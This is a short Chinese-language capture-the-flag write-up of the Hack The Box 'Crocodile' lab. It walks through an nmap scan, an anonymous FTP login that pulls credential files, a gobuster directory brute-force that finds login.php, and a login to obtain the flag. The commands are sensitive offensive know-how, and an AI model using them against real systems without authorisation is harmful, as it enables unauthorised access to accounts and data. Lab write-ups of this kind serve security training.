STARTING POINT TIER 1 Crocodile

STARTING POINT TIER 1 Crocodile

这是一个关于错误配置导致数据泄露的关卡。

首先nmap开扫

└─$ nmap -sV -A [ip-address]      
Nmap scan report for aioCloud
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.14.45
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 ftp      ftp            33 Jun 08  2021 allowed.userlist
|_-rw-r--r--    1 ftp      ftp            62 Apr 20  2021 allowed.userlist.passwd
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Smash - Bootstrap Business Template
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Unix

扫出了2个端口

• 21端口运行FTP运行匿名登录
• 80端口运行Apache说明应该存在web应用

匿名登录看看FTP有啥吧

└─$ ftp [ip-address]
Connected to [ip-address]
220 (vsFTPd 3.0.3)
Name (10.129.54.245:highway): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> ls
229 Entering Extended Passive Mode (|||47137|)
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp            33 Jun 08  2021 allowed.userlist
-rw-r--r--    1 ftp      ftp            62 Apr 20  2021 allowed.userlist.passwd

全都下载下来拿到用户名和密码，然后去浏览器输入[ip-address]果然存在web应用。

用gobuster爆破目录

└─$ gobuster dir --url [ip-address] -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html

爆出登录目录login.php

-x参数让gobuster搜索指定的文件类型

进入登录界面后，根据得到的账号密码拿到flag。